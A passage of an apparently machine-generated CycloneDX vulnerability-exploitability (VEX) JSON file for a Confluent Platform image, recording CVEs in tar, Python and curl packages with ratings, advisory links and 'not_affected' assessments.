          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59875",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        248
      ],
      "description": "node-tar is a tar archive manipulation library for Node.js. Prior to 7.5.17, node-tar does not strip NUL bytes from PAX path and linkpath records in src/pax.ts, allowing a crafted archive with values to reach fs.lstat or fs.open and terminate the process with an uncaught exception. This issue is fixed in version 7.5.17.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59875"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59875"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3"
        },
        {
          "url": "https://github.com/isaacs/node-tar/releases/tag/v7.5.17"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59875"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59875"
        }
      ],
      "published": "2026-07-08T16:16:34+00:00",
      "updated": "2026-07-10T19:10:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6019",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        150,
        116
      ],
      "description": "http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28247"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28581"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6019"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2460869"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460869"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6019"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28247.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28581"
        },
        {
          "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
        },
        {
          "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
        },
        {
          "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
        },
        {
          "url": "https://github.com/python/cpython/issues/90309"
        },
        {
          "url": "https://github.com/python/cpython/pull/148848"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-6019.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28581.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019"
        }
      ],
      "published": "2026-04-22T20:16:42+00:00",
      "updated": "2026-07-27T17:34:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6253",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "curl might erroneously pass on credentials for a first proxy to a second\nproxy.\n\nThis can happen when the following conditions are true:\n\n1. curl is setup to use specific different proxies for different URL schemes\n2. the first proxy needs credentials\n3. the second proxy uses no credentials\n4. while using the first proxy (using say `http://`), curl is asked to follow\n   a redirect to a URL using another scheme (say `https://`), accessed using a\n   second, different, proxy",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6253"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/11"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6253"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.json"
        },
        {
          "url": "https://hackerone.com/reports/3669637"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
